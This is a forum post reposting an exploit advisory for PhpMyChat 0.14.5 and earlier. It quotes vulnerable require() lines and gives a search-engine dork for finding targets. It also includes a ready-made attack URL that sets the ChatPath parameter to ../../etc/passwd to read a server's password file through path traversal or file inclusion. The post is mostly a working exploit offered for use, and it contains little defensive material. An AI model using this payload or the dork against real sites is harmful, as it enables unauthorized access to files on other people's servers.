Jump to content
escalation666

PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability

Recommended Posts

Posted

*******************************************************************************

# Title : PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability

# Author : ajann

# Dork : phpMyChat 0.14.5 , phpMyChat

# Vuln;

*******************************************************************************

[File]

localization/languages.lib.php3

[/File]

[Code,1]

languages.lib.php3 Error:

..

....

require("./${ChatPath}config/config.lib.php3");

require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");

require("./${ChatPath}lib/clean.lib.php3");

....

..

Key [:] ChatPath=[file]

Example:

http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/passwd

# ajann,Turkey

# ...

# Im not Hacker!

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...